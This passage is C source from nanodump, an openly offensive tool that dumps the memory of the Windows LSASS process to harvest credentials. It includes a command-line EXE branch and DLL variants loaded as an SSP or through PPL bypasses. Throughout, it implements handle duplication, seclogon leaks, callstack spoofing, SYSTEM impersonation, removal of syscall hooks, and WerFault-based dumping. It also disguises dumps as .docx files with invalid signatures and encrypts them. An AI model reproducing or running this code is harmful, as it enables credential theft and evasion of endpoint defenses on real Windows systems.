        erase_dump_from_memory(dc.BaseAddress, dc.DumpMaxSize);
    if (!ret_val && write_dump_to_disk)
        delete_file(dump_path);
    if (hSnapshot)
        free_snapshot(hSnapshot);
    if (created_processes)
    {
        kill_created_processes(created_processes);
        DATA_FREE(created_processes, sizeof(PROCESS_LIST));
    }
    if (hImpersonate)
    {
        revert_to_self();
        NtClose(hImpersonate);
    }
}

#elif defined(NANO) && defined(EXE)

void usage(char* procname)
{
    PRINT("usage: %s [--write C:\\Windows\\Temp\\doc.docx] [--valid] [--duplicate] [--elevate-handle] [--duplicate-elevate] [--seclogon-leak-local] [--seclogon-leak-remote C:\\Windows\\notepad.exe] [--seclogon-duplicate] [--spoof-callstack svchost] [--silent-process-exit C:\\Windows\\Temp] [--shtinkering] [--fork] [--snapshot] [--getpid] [--help]", procname);
    PRINT("Dumpfile options:");
    PRINT("    --write DUMP_PATH, -w DUMP_PATH");
    PRINT("            filename of the dump");
    PRINT("    --valid, -v");
    PRINT("            create a dump with a valid signature");
    PRINT("Obtain an LSASS handle via:");
    PRINT("    --duplicate, -d");
    PRINT("            duplicate a high privileged existing " LSASS " handle");
    PRINT("    --duplicate-elevate, -de");
    PRINT("            duplicate a low privileged existing " LSASS " handle and then elevate it");
    PRINT("    --seclogon-leak-local, -sll");
    PRINT("            leak an " LSASS " handle into nanodump via seclogon");
    PRINT("    --seclogon-leak-remote BIN_PATH, -slt BIN_PATH");
    PRINT("            leak an " LSASS " handle into another process via seclogon and duplicate it");
    PRINT("    --seclogon-duplicate, -sd");
    PRINT("            make seclogon open a handle to " LSASS " and duplicate it");
    PRINT("    --spoof-callstack, -sc");
    PRINT("            open a handle to " LSASS " using a fake calling stack");
    PRINT("Let WerFault.exe (instead of nanodump) create the dump");
    PRINT("    --silent-process-exit DUMP_FOLDER, -spe DUMP_FOLDER");
    PRINT("            force WerFault.exe to dump " LSASS " via SilentProcessExit");
    PRINT("    --shtinkering, -sk");
    PRINT("            force WerFault.exe to dump " LSASS " via Shtinkering");
    PRINT("Avoid reading " LSASS " directly:");
    PRINT("    --fork, -f");
    PRINT("            fork the target process before dumping");
    PRINT("    --snapshot, -s");
    PRINT("            snapshot the target process before dumping");
    PRINT("Avoid opening a handle with high privileges:")
    PRINT("    --elevate-handle, -eh");
    PRINT("            open a handle to " LSASS " with low privileges and duplicate it to gain higher privileges");
    PRINT("Miscellaneous:");
    PRINT("    --getpid");
    PRINT("            print the PID of " LSASS " and leave");
    PRINT("Help:");
    PRINT("    --help, -h");
    PRINT("            print this help message and leave");
}

int main(int argc, char* argv[])
{
    dump_context   dc                             = { 0 };
    DWORD          lsass_pid                      = 0;
    HANDLE         hProcess                       = NULL;
    BOOL           fork_lsass                     = FALSE;
    BOOL           snapshot_lsass                 = FALSE;
    BOOL           duplicate_handle               = FALSE;
    BOOL           elevate_handle                 = FALSE;
    BOOL           duplicate_elevate              = FALSE;
    LPCSTR         silent_process_exit            = NULL;
    LPCSTR         dump_path                      = NULL;
    BOOL           success                        = FALSE;
    BOOL           use_valid_sig                  = FALSE;
    BOOL           get_pid_and_leave              = FALSE;
    BOOL           use_seclogon_leak_local        = FALSE;
    BOOL           use_seclogon_leak_remote       = FALSE;
    BOOL           is_seclogon_leak_local_stage_2 = FALSE;
    LPCSTR         seclogon_leak_remote_binary    = NULL;
    BOOL           use_seclogon_duplicate         = FALSE;
    BOOL           use_lsass_shtinkering          = FALSE;
    BOOL           spoof_callstack                = FALSE;
    HANDLE         hSnapshot                      = NULL;
    PPROCESS_LIST  created_processes              = NULL;
    BOOL           ret_val                        = FALSE;
    DWORD          num_modes                      = 0;
    WCHAR          wcFilePath[MAX_PATH]           = { 0 };
    UNICODE_STRING full_dump_path                 = { 0 };
    BOOL           running_as_system              = FALSE;
    WCHAR          wcSnycPath[MAX_PATH]           = { 0 };
    UNICODE_STRING synchronization_file           = { 0 };
    BOOL           do_synchronize                 = FALSE;
    HANDLE         hImpersonate                   = NULL;

    full_dump_path.Buffer        = wcFilePath;
    full_dump_path.Length        = 0;
    full_dump_path.MaximumLength = 0;

    synchronization_file.Buffer        = wcSnycPath;
    synchronization_file.Length        = 0;
    synchronization_file.MaximumLength = 0;

    dc.BaseAddress = NULL;
    dc.DumpMaxSize = 0;

#ifdef _M_IX86
    if (local_is_wow64())
    {
        PRINT_ERR("Nanodump does not support WoW64");
        return 0;
    }
#endif

    for (int i = 1; i < argc; ++i)
    {
        if (!strncmp(argv[i], "--getpid", 9))
        {
            get_pid_and_leave = TRUE;
        }
        else if (!strncmp(argv[i], "-v", 3) ||
            !strncmp(argv[i], "--valid", 8))
        {
            use_valid_sig = TRUE;
        }
        else if (!strncmp(argv[i], "-w", 3) ||
                 !strncmp(argv[i], "--write", 8))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write value");
                return 0;
            }
            dump_path = argv[++i];
            get_full_path(&full_dump_path, dump_path);
        }
        else if (!strncmp(argv[i], "-p", 3) ||
                 !strncmp(argv[i], "--pid", 6))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --pid value");
                return 0;
            }
            i++;
            lsass_pid = atoi(argv[i]);
            if (!lsass_pid ||
                strspn(argv[i], "0123456789") != strlen(argv[i]))
            {
                PRINT("Invalid PID: %s", argv[i]);
                return 0;
            }
        }
        else if (!strncmp(argv[i], "-f", 3) ||
                 !strncmp(argv[i], "--fork", 7))
        {
            fork_lsass = TRUE;
        }
        else if (!strncmp(argv[i], "-s", 3) ||
                 !strncmp(argv[i], "--snapshot", 11))
        {
            snapshot_lsass = TRUE;
        }
        else if (!strncmp(argv[i], "-d", 3) ||
                 !strncmp(argv[i], "--duplicate", 12))
        {
            duplicate_handle = TRUE;
        }
        else if (!strncmp(argv[i], "-eh", 4) ||
                 !strncmp(argv[i], "--elevate-handle", 17))
        {
            elevate_handle = TRUE;
        }
        else if (!strncmp(argv[i], "-de", 4) ||
                 !strncmp(argv[i], "--duplicate-elevate", 20))
        {
            duplicate_elevate = TRUE;
        }
        else if (!strncmp(argv[i], "-sll", 5) ||
                 !strncmp(argv[i], "--seclogon-leak-local", 22))
        {
            use_seclogon_leak_local = TRUE;
        }
        else if (!strncmp(argv[i], "-slr", 5) ||
                 !strncmp(argv[i], "--seclogon-leak-remote", 23))
        {
            use_seclogon_leak_remote = TRUE;
            if (i + 1 >= argc)
            {
                PRINT("missing --seclogon-leak-remote value");
                return 0;
            }
            seclogon_leak_remote_binary = argv[++i];
            if (!strrchr(seclogon_leak_remote_binary, '\\'))
            {
                PRINT("You must provide a full path: %s", seclogon_leak_remote_binary);
                return 0;
            }
            if (!file_exists(seclogon_leak_remote_binary))
            {
                PRINT("The binary \"%s\" does not exists.", seclogon_leak_remote_binary);
                return 0;
            }
        }
        else if (!strncmp(argv[i], "-s2", 4) ||
                 !strncmp(argv[i], "--stage2", 9))
        {
            is_seclogon_leak_local_stage_2 = TRUE;
        }
        else if (!strncmp(argv[i], "-spe", 5) ||
                 !strncmp(argv[i], "--silent-process-exit", 22))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --silent-process-exit value");
                return 0;
            }
            silent_process_exit = argv[++i];
            if (!create_folder(silent_process_exit))
            {
                PRINT("The folder \"%s\" is not valid.", silent_process_exit);
                return 0;
            }
        }
        else if (!strncmp(argv[i], "-sk", 4) ||
                 !strncmp(argv[i], "--shtinkering", 14))
        {
            use_lsass_shtinkering = TRUE;

            success = is_current_user_system(&running_as_system);
            if (!success)
                goto cleanup;

            if (!running_as_system)
            {
                PRINT_ERR("You must be SYSTEM to run the Shtinkering technique");
                return 0;
            }
        }
        else if (!strncmp(argv[i], "-sd", 4) ||
                 !strncmp(argv[i], "--seclogon-duplicate", 21))
        {
            use_seclogon_duplicate = TRUE;
        }
        else if (!strncmp(argv[i], "-sync", 6))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing -sync value");
                return 0;
            }
            do_synchronize = TRUE;
            get_full_path(&synchronization_file, argv[++i]);
        }
        else if (!strncmp(argv[i], "-sc", 4) ||
                 !strncmp(argv[i], "--spoof-callstack", 18))
        {
            spoof_callstack = TRUE;
        }
        else if (!strncmp(argv[i], "-h", 3) ||
                 !strncmp(argv[i], "--help", 7))
        {
            usage(argv[0]);
            return 0;
        }
        else
        {
            PRINT("invalid argument: %s", argv[i]);
            return 0;
        }
    }

    if (full_dump_path.Length)
        num_modes++;
    if (get_pid_and_leave)
        num_modes++;
    if (silent_process_exit)
        num_modes++;
    if (use_lsass_shtinkering)
        num_modes++;
    if (num_modes != 1)
    {
        PRINT("Only one of the following parameters must be provided:")
        PRINT(" --write: nanodump will create the dump");
        PRINT(" --silent-process-exit: WerFault will create the dump via SilentProcessExit");
        PRINT(" --shtinkering: WerFault will create the dump via Shtinkering");
        PRINT(" --getpid: get the PID of " LSASS);
        PRINT("Enter --help for more details");
        return 0;
    }

    if (get_pid_and_leave &&
        (use_valid_sig || snapshot_lsass || fork_lsass || elevate_handle || duplicate_elevate ||
         use_seclogon_duplicate || spoof_callstack || use_seclogon_leak_local ||
         use_seclogon_leak_remote || duplicate_handle || silent_process_exit))
    {
        PRINT("The parameter --getpid is used alone");
        return 0;
    }

    if (silent_process_exit &&
        (use_valid_sig || snapshot_lsass || fork_lsass ||
         use_seclogon_duplicate || spoof_callstack || use_seclogon_leak_local ||
         use_seclogon_leak_remote || duplicate_handle || elevate_handle || duplicate_elevate))
    {
        PRINT("The parameter --silent-process-exit is used alone");
        return 0;
    }

    if (fork_lsass && snapshot_lsass)
    {
        PRINT("The options --fork and --snapshot cannot be used together");
        return 0;
    }

    if (duplicate_handle && elevate_handle)
    {
        PRINT("The options --duplicate and --elevate-handle cannot be used together");
        return 0;
    }

    if (duplicate_elevate && spoof_callstack)
    {
        PRINT("The options --duplicate-elevate and --spoof-callstack cannot be used together");
        return 0;
    }

    if (duplicate_handle && spoof_callstack)
    {
        PRINT("The options --duplicate and --spoof-callstack cannot be used together");
        return 0;
    }

    if (duplicate_handle && use_seclogon_duplicate)
    {
        PRINT("The options --duplicate and --seclogon-duplicate cannot be used together");
        return 0;
    }

    if (elevate_handle && duplicate_elevate)
    {
        PRINT("The options --elevate-handle and --duplicate-elevate cannot be used together");
        return 0;
    }

    if (duplicate_elevate && duplicate_handle)
    {
        PRINT("The options --duplicate-elevate and --duplicate cannot be used together");
        return 0;
    }

    if (duplicate_elevate && use_seclogon_duplicate)
    {
        PRINT("The options --duplicate-elevate and --seclogon-duplicate cannot be used together");
        return 0;
    }

    if (elevate_handle && use_seclogon_duplicate)
    {
        PRINT("The options --elevate-handle and --seclogon-duplicate cannot be used together");
        return 0;
    }

    if (duplicate_handle && use_seclogon_leak_local)
    {
        PRINT("The options --duplicate and --seclogon-leak-local cannot be used together");
        return 0;
    }

    if (duplicate_elevate && use_seclogon_leak_local)
    {
        PRINT("The options --duplicate-elevate and --seclogon-leak-local cannot be used together");
        return 0;
    }

    if (elevate_handle && use_seclogon_leak_local)
    {
        PRINT("The options --elevate-handle and --seclogon-leak-local cannot be used together");
        return 0;
    }

    if (duplicate_handle && use_seclogon_leak_remote)
    {
        PRINT("The options --duplicate and --seclogon-leak-remote cannot be used together");
        return 0;
    }

    if (elevate_handle && use_seclogon_leak_remote)
    {
        PRINT("The options --elevate-handle and --seclogon-leak-remote cannot be used together");
        return 0;
    }

    if (duplicate_elevate && use_seclogon_leak_remote)
    {
        PRINT("The options --duplicate-elevate and --seclogon-leak-remote cannot be used together");
        return 0;
    }

    if (use_seclogon_leak_local && use_seclogon_leak_remote)
    {
        PRINT("The options --seclogon-leak-local and --seclogon-leak-remote cannot be used together");
        return 0;
    }

    if (use_seclogon_leak_local && use_seclogon_duplicate)
    {
        PRINT("The options --seclogon-leak-local and --seclogon-duplicate cannot be used together");
        return 0;
    }

    if (use_seclogon_leak_local && spoof_callstack)
    {
        PRINT("The options --seclogon-leak-local and --spoof-callstack cannot be used together");
        return 0;
    }

    if (use_seclogon_leak_remote && use_seclogon_duplicate)
    {
        PRINT("The options --seclogon-leak-remote and --seclogon-duplicate cannot be used together");
        return 0;
    }

    if (use_seclogon_leak_remote && spoof_callstack)
    {
        PRINT("The options --seclogon-leak-remote and --spoof-callstack cannot be used together");
        return 0;
    }

    if (use_seclogon_duplicate && spoof_callstack)
    {
        PRINT("The options --seclogon-duplicate and --spoof-callstack cannot be used together");
        return 0;
    }

    if (!use_lsass_shtinkering && use_seclogon_leak_local && !is_full_path(dump_path))
    {
        PRINT("If --seclogon-leak-local is being used, you need to provide the full path: %s", dump_path);
        return 0;
    }

    if (use_lsass_shtinkering && fork_lsass)
    {
        PRINT("The options --shtinkering and --fork cannot be used together");
        return 0;
    }

    if (use_lsass_shtinkering && snapshot_lsass)
    {
        PRINT("The options --shtinkering and --snapshot cannot be used together");
        return 0;
    }

    if (use_lsass_shtinkering && use_valid_sig)
    {
        PRINT("The options --shtinkering and --valid cannot be used together");
        return 0;
    }

    remove_syscall_callback_hook();

    success = enable_debug_priv();
    if (!success)
        goto cleanup;

    // if not provided, get the PID of LSASS
    if (!lsass_pid)
    {
        lsass_pid = get_lsass_pid();
        if (!lsass_pid)
            goto cleanup;
    }
    else
    {
        DPRINT("Using %ld as the PID of " LSASS, lsass_pid);
    }

    // get the PID of LSASS and leave (is this even used by anyone?)
    if (get_pid_and_leave)
    {
        PRINT(LSASS " PID: %ld", lsass_pid);
        ret_val = TRUE;
        goto cleanup;
    }

    if (elevate_handle || duplicate_elevate)
    {
        success = is_current_user_system(&running_as_system);
        if (!success)
            goto cleanup;

        if (!running_as_system)
        {
            DPRINT("The options --elevate-handle and --duplicate-elevate require SYSTEM, impersonating...");
            success = impersonate_system(&hImpersonate);
            if (!success)
                goto cleanup;
            DPRINT("Impersonating SYSTEM")
        }
    }

    if (silent_process_exit)
    {
        // let the Windows Error Reporting process make the dump for us
        ret_val = werfault_silent_process_exit(lsass_pid, silent_process_exit);
        goto cleanup;
    }

    if (use_seclogon_leak_local && !seclogon_leak_remote_binary)
        seclogon_leak_remote_binary = argv[0];

    if (!use_lsass_shtinkering)
    {
        if (!create_file(&full_dump_path))
            goto cleanup;
    }

    success = obtain_lsass_handle(
        &hProcess,
        lsass_pid,
        duplicate_handle,
        elevate_handle,
        duplicate_elevate,
        use_seclogon_duplicate,
        spoof_callstack,
        is_seclogon_leak_local_stage_2,
        seclogon_leak_remote_binary,
        &created_processes,
        use_valid_sig,
        dump_path,
        fork_lsass,
        snapshot_lsass,
        &hSnapshot,
        use_seclogon_leak_local,
        use_seclogon_leak_remote,
        use_lsass_shtinkering);
    if (!success)
        goto cleanup;

    if (use_seclogon_leak_local && !is_seclogon_leak_local_stage_2)
        return 0;

    if (use_lsass_shtinkering)
    {
        ret_val = werfault_shtinkering(
            lsass_pid,
            hProcess);
        goto cleanup;
    }

    // set the signature
    if (use_valid_sig)
    {
        DPRINT("Using a valid signature");
        dc.Signature = MINIDUMP_SIGNATURE;
        dc.Version = MINIDUMP_VERSION;
        dc.ImplementationVersion = MINIDUMP_IMPL_VERSION;
    }
    else
    {
        DPRINT("Using a invalid signature");
        generate_invalid_sig(
            &dc.Signature,
            &dc.Version,
            &dc.ImplementationVersion);
    }

    // allocate a chuck of memory to write the dump
    SIZE_T region_size = DUMP_MAX_SIZE;
    PVOID base_address = allocate_memory(&region_size);
    if (!base_address)
        goto cleanup;

    dc.hProcess    = hProcess;
    dc.BaseAddress = base_address;
    dc.rva         = 0;
    dc.DumpMaxSize = region_size;

    success = NanoDumpWriteDump(&dc);
    if (!success)
        goto cleanup;

    DPRINT(
        "The dump was created successfully, final size: %d MiB",
        (dc.rva/1024)/1024);

    if (!use_valid_sig)
    {
        // at this point, you can encrypt or obfuscate the dump
        encrypt_dump(
            dc.BaseAddress,
            dc.rva);
    }

    success = write_file(
        &full_dump_path,
        dc.BaseAddress,
        dc.rva);

    if (!success)
        goto cleanup;

    if (!is_seclogon_leak_local_stage_2)
    {
        print_success(
            dump_path,
            use_valid_sig,
            TRUE);
    }

    ret_val = TRUE;

cleanup:
    if (hProcess && fork_lsass)
        kill_process(0, hProcess);
    if (hProcess)
        NtClose(hProcess);
    if (dc.BaseAddress && dc.DumpMaxSize)
        erase_dump_from_memory(dc.BaseAddress, dc.DumpMaxSize);
    if (!ret_val && dump_path)
        delete_file(dump_path);
    if (hSnapshot)
        free_snapshot(hSnapshot);
    if (created_processes)
    {
        kill_created_processes(created_processes);
        DATA_FREE(created_processes, sizeof(PROCESS_LIST));
    }
    if (hImpersonate)
    {
        revert_to_self();
        NtClose(hImpersonate);
    }
    if (ret_val && do_synchronize)
        create_file(&synchronization_file);

    return 0;
}

#elif defined(NANO) && defined(SSP)

#include "ssp.h"
#include "pipe.h"

BOOL NanoDumpSSP(void)
{
#if !defined(PASS_PARAMS_VIA_NAMED_PIPES) || (PASS_PARAMS_VIA_NAMED_PIPES == 0)

    /*
     * if you compile with -DPASS_PARAMS_VIA_NAMED_PIPES=0, then these are the parameters
     * that the nanodump DLL will use, change them to your liking
     */
    /******************* change this *******************/
    LPCSTR         dump_path            = "C:\\Windows\\Temp\\report.docx";
    BOOL           use_valid_sig        = FALSE;
    /***************************************************/
    dump_context   dc                   = { 0 };
    BOOL           ret_val              = FALSE;
    BOOL           success              = FALSE;
    HANDLE         hProcess             = NULL;
    SIZE_T         region_size          = 0;
    PVOID          base_address         = NULL;
    WCHAR          wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING full_dump_path       = { 0 };

#else
    HANDLE         hPipe                = NULL;
    LPSTR          dump_path            = NULL;
    BOOL           use_valid_sig        = FALSE;
    dump_context   dc                   = { 0 };
    BOOL           ret_val              = FALSE;
    BOOL           success              = FALSE;
    HANDLE         hProcess             = NULL;
    SIZE_T         region_size          = 0;
    PVOID          base_address         = NULL;
    WCHAR          wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING full_dump_path       = { 0 };

    success = server_create_named_pipe(
        IPC_PIPE_NAME,
        FALSE,
        &hPipe);
    if (!success)
        goto cleanup;

    success = server_listen_on_named_pipe(
        hPipe);
    if (!success)
        goto cleanup;

    success = server_recv_arguments_from_pipe(
        hPipe,
        &dump_path,
        &use_valid_sig,
        NULL);
    if (!success)
        goto cleanup;

#endif

    full_dump_path.Buffer        = wcFilePath;
    full_dump_path.Length        = 0;
    full_dump_path.MaximumLength = 0;

    dc.BaseAddress = NULL;
    dc.DumpMaxSize = 0;

    get_full_path(&full_dump_path, dump_path);

    if (!create_file(&full_dump_path))
        goto cleanup;

    // set the signature
    if (use_valid_sig)
    {
        dc.Signature = MINIDUMP_SIGNATURE;
        dc.Version = MINIDUMP_VERSION;
        dc.ImplementationVersion = MINIDUMP_IMPL_VERSION;
    }
    else
    {
        generate_invalid_sig(
            &dc.Signature,
            &dc.Version,
            &dc.ImplementationVersion);
    }

    // we are LSASS after all :)
    hProcess = NtCurrentProcess();

    // allocate a chuck of memory to write the dump
    region_size = DUMP_MAX_SIZE;
    base_address = allocate_memory(&region_size);
    if (!base_address)
        goto cleanup;

    dc.hProcess    = hProcess;
    dc.BaseAddress = base_address;
    dc.rva         = 0;
    dc.DumpMaxSize = region_size;

    success = NanoDumpWriteDump(&dc);
    if (!success)
        goto cleanup;

    if (!use_valid_sig)
    {
        // at this point, you can encrypt or obfuscate the dump
        encrypt_dump(
            dc.BaseAddress,
            dc.rva);
    }

    success = write_file(
        &full_dump_path,
        dc.BaseAddress,
        dc.rva);

    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (dc.BaseAddress && dc.DumpMaxSize)
        erase_dump_from_memory(dc.BaseAddress, dc.DumpMaxSize);
    if (!ret_val)
        delete_file(dump_path);
#if defined(PASS_PARAMS_VIA_NAMED_PIPES) && (PASS_PARAMS_VIA_NAMED_PIPES == 1)
    if (dump_path)
        intFree(dump_path);
    server_send_success(
        hPipe,
        ret_val);
    if (hPipe)
        server_disconnect_pipe(hPipe);
    if (hPipe)
        NtClose(hPipe);
#endif

    return ret_val;
}

__declspec(dllexport) BOOL APIENTRY DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{
    UNUSED(hinstDLL);
    UNUSED(lpReserved);
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            NanoDumpSSP();
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return FALSE;
}

#elif defined(NANO) && defined(PPL_DUMP)

#include "ppl/cleanup.h"

BOOL NanoDumpPPLDump(VOID)
{
    dump_context   dc                   = { 0 };
    BOOL           bReturnValue         = FALSE;
    HANDLE         hProcess             = NULL;
    DWORD          lsass_pid            = 0;
    BOOL           duplicate_handle     = FALSE;
    BOOL           success              = TRUE;
    BOOL           use_valid_sig        = FALSE;
    SIZE_T         region_size          = 0;
    PVOID          base_address         = NULL;
    CHAR           dump_path[MAX_PATH]  = { 0 };
    WCHAR          wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING full_dump_path       = { 0 };
    LPWSTR*        argv                 = NULL;

    full_dump_path.Buffer        = wcFilePath;
    full_dump_path.Length        = 0;
    full_dump_path.MaximumLength = 0;

    dc.BaseAddress = NULL;
    dc.DumpMaxSize = 0;

#ifdef _M_IX86
    if(local_is_wow64())
    {
        PRINT_ERR("Nanodump does not support WoW64");
        return FALSE;
    }
#endif

    //remove_syscall_callback_hook();

    success = delete_known_dll_entry();
    if (!success)
        goto cleanup;

    CommandLineToArgvW_t CommandLineToArgvW;
    CommandLineToArgvW = (CommandLineToArgvW_t)(ULONG_PTR)get_function_address(
        get_library_address(SHELL32_DLL, TRUE),
        CommandLineToArgvW_SW2_HASH,
        0);
    if (!CommandLineToArgvW)
    {
        api_not_found("CommandLineToArgvW");
        goto cleanup;
    }
    GetCommandLineW_t GetCommandLineW;
    GetCommandLineW = (GetCommandLineW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetCommandLineW_SW2_HASH,
        0);
    if (!GetCommandLineW)
    {
        api_not_found("GetCommandLineW");
        goto cleanup;
    }

    int argc = 0;
    argv = CommandLineToArgvW(GetCommandLineW(), &argc);
    if (!argv || !argc)
        goto cleanup;

    for (int i = 1; i < argc; ++i)
    {
        if (!_wcsicmp(argv[i], L"-v") ||
            !_wcsicmp(argv[i], L"--valid"))
        {
            use_valid_sig = TRUE;
        }
        else if (!_wcsicmp(argv[i], L"-w") ||
                 !_wcsicmp(argv[i], L"--write"))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write value");
                goto cleanup;
            }
            wcstombs(dump_path, argv[++i], MAX_PATH);
            get_full_path(&full_dump_path, dump_path);
        }
        else if (!_wcsicmp(argv[i], L"-p") ||
                 !_wcsicmp(argv[i], L"--pid"))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --pid value");
                goto cleanup;
            }
            i++;
            lsass_pid = wcstoul(argv[i], NULL, 10);
        }
        else if (!_wcsicmp(argv[i], L"-d") ||
                 !_wcsicmp(argv[i], L"--duplicate"))
        {
            duplicate_handle = TRUE;
        }
        else
        {
            PRINT("invalid argument: %s", argv[i]);
            goto cleanup;
        }
    }

    LocalFree(argv); argv = NULL;

    if (!full_dump_path.Length)
        goto cleanup;

    success = enable_debug_priv();
    if (!success)
        goto cleanup;
	
    // if not provided, get the PID of LSASS
    if (!lsass_pid)
    {
        lsass_pid = get_lsass_pid();
        if (!lsass_pid)
            goto cleanup;
    }
    else
    {
        DPRINT("Using %ld as the PID of " LSASS, lsass_pid);
    }

    if (!full_dump_path.Length)
    {
        PRINT("You must provide the dump file: --write C:\\Windows\\Temp\\doc.docx");
        goto cleanup;
    }

    if (!create_file(&full_dump_path))
        goto cleanup;

    success = obtain_lsass_handle(
        &hProcess,
        lsass_pid,
        duplicate_handle,
        FALSE,
        FALSE,
        FALSE,
        FALSE,
        FALSE,
        NULL,
        NULL,
        use_valid_sig,
        dump_path,
        FALSE,
        FALSE,
        NULL,
        FALSE,
        FALSE,
        FALSE);
    if (!success)
        goto cleanup;

    // set the signature
    if (use_valid_sig)
    {
        DPRINT("Using a valid signature");
        dc.Signature = MINIDUMP_SIGNATURE;
        dc.Version = MINIDUMP_VERSION;
        dc.ImplementationVersion = MINIDUMP_IMPL_VERSION;
    }
    else
    {
        DPRINT("Using a invalid signature");
        generate_invalid_sig(
            &dc.Signature,
            &dc.Version,
            &dc.ImplementationVersion);
    }

    // allocate a chuck of memory to write the dump
    region_size = DUMP_MAX_SIZE;
    base_address = allocate_memory(&region_size);
    if (!base_address)
        goto cleanup;

    dc.hProcess    = hProcess;
    dc.BaseAddress = base_address;
    dc.rva         = 0;
    dc.DumpMaxSize = region_size;

    success = NanoDumpWriteDump(&dc);
    if (!success)
        goto cleanup;

    DPRINT(
        "The dump was created successfully, final size: %d MiB",
        (dc.rva/1024)/1024);

    if (!use_valid_sig)
    {
        // at this point, you can encrypt or obfuscate the dump
        encrypt_dump(
            dc.BaseAddress,
            dc.rva);
    }

    success = write_file(
        &full_dump_path,
        dc.BaseAddress,
        dc.rva);

    if (!success)
        goto cleanup;

    bReturnValue = TRUE;

cleanup:
    if (argv)
        LocalFree(argv);
    if (dc.BaseAddress && dc.DumpMaxSize)
        erase_dump_from_memory(dc.BaseAddress, dc.DumpMaxSize);
    if (hProcess)
        NtClose(hProcess);
    if (!bReturnValue)
        delete_file(dump_path);

    return bReturnValue;
}

__declspec(dllexport) BOOL APIENTRY DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{
    UNUSED(hinstDLL);
    UNUSED(lpReserved);
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            NanoDumpPPLDump();
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

// Windows 8.1 -> SspiCli.dll
//
//   000000014005B1C8  LogonUserExExW SspiCli
//
void APIENTRY LogonUserExExW(VOID) {}

//
// Windows 10 -> EventAggregation.dll
//
//   0000000140083728  EaDeleteAggregatedEvent EventAggregation
//   0000000140083730  BriCreateBrokeredEvent EventAggregation
//   0000000140083738  EaCreateAggregatedEvent EventAggregation
//   0000000140083740  BriDeleteBrokeredEvent EventAggregation
//   0000000140083748  EACreateAggregateEvent EventAggregation
//   0000000140083750  EaQueryAggregatedEventParameters EventAggregation
//   0000000140083758  EaFreeAggregatedEventParameters EventAggregation
//   0000000140083760  EADeleteAggregateEvent EventAggregation
//   0000000140083768  EAQueryAggregateEventData EventAggregation
void APIENTRY BriCreateBrokeredEvent(VOID) {}
void APIENTRY BriDeleteBrokeredEvent(VOID) {}
void APIENTRY EaCreateAggregatedEvent(VOID) {}
void APIENTRY EACreateAggregateEvent(VOID) {}
void APIENTRY EaQueryAggregatedEventParameters(VOID) {}
void APIENTRY EAQueryAggregateEventData(VOID) {}
void APIENTRY EaFreeAggregatedEventParameters(VOID) {}
void APIENTRY EaDeleteAggregatedEvent(VOID) {}
void APIENTRY EADeleteAggregateEvent(VOID) {}

#elif defined(NANO) && defined(PPL_MEDIC)

#include "ppl/ppl_medic.h"
#include "ppl/ppl_medic_dll.h"
#include "pipe.h"

BOOL NanoDumpPPLMedic(VOID)
{
#if !defined(PASS_PARAMS_VIA_NAMED_PIPES) || (PASS_PARAMS_VIA_NAMED_PIPES == 0)

    /*
     * if you compile with -DPASS_PARAMS_VIA_NAMED_PIPES=0, then these are the parameters
     * that the nanodump DLL will use, change them to your liking
     */
    /******************* change this *******************/
    LPSTR          dump_path            = "C:\\Windows\\Temp\\report.docx";
    BOOL           use_valid_sig        = FALSE;
    BOOL           elevate_handle       = FALSE;
    /***************************************************/
    dump_context   dc                   = { 0 };
    BOOL           ret_val              = FALSE;
    BOOL           success              = FALSE;
    DWORD          lsass_pid            = 0;
    HANDLE         hProcess             = NULL;
    SIZE_T         region_size          = 0;
    PVOID          base_address         = NULL;
    WCHAR          wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING full_dump_path       = { 0 };

    signal_dll_load_event(STR_IPC_WAASMEDIC_LOAD_EVENT_NAME);

#else
    HANDLE         hPipe                = NULL;
    LPSTR          dump_path            = NULL;
    BOOL           use_valid_sig        = FALSE;
    BOOL           elevate_handle       = FALSE;
    dump_context   dc                   = { 0 };
    BOOL           ret_val              = FALSE;
    BOOL           success              = FALSE;
    DWORD          lsass_pid            = 0;
    HANDLE         hProcess             = NULL;
    SIZE_T         region_size          = 0;
    PVOID          base_address         = NULL;
    WCHAR          wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING full_dump_path       = { 0 };

    success = server_create_named_pipe(
        IPC_PIPE_NAME,
        FALSE,
        &hPipe);
    if (!success)
        goto cleanup;

    success = signal_dll_load_event(STR_IPC_WAASMEDIC_LOAD_EVENT_NAME);
    if (!success)
        goto cleanup;

    success = server_listen_on_named_pipe(
        hPipe);
    if (!success)
        goto cleanup;

    success = server_recv_arguments_from_pipe(
        hPipe,
        &dump_path,
        &use_valid_sig,
        &elevate_handle);
    if (!success)
        goto cleanup;

#endif

    full_dump_path.Buffer        = wcFilePath;
    full_dump_path.Length        = 0;
    full_dump_path.MaximumLength = 0;
    get_full_path(&full_dump_path, dump_path);

    dc.BaseAddress = NULL;
    dc.DumpMaxSize = 0;

#ifdef _M_IX86
    if(local_is_wow64())
    {
        PRINT_ERR("Nanodump does not support WoW64");
        return FALSE;
    }
#endif

    //remove_syscall_callback_hook();

    if (!full_dump_path.Length)
        goto cleanup;

    // not sure why this fails
    //success = enable_debug_priv();
    //if (!success)
    //    goto cleanup;
    
    // if not provided, get the PID of LSASS
    if (!lsass_pid)
    {
        lsass_pid = get_lsass_pid();
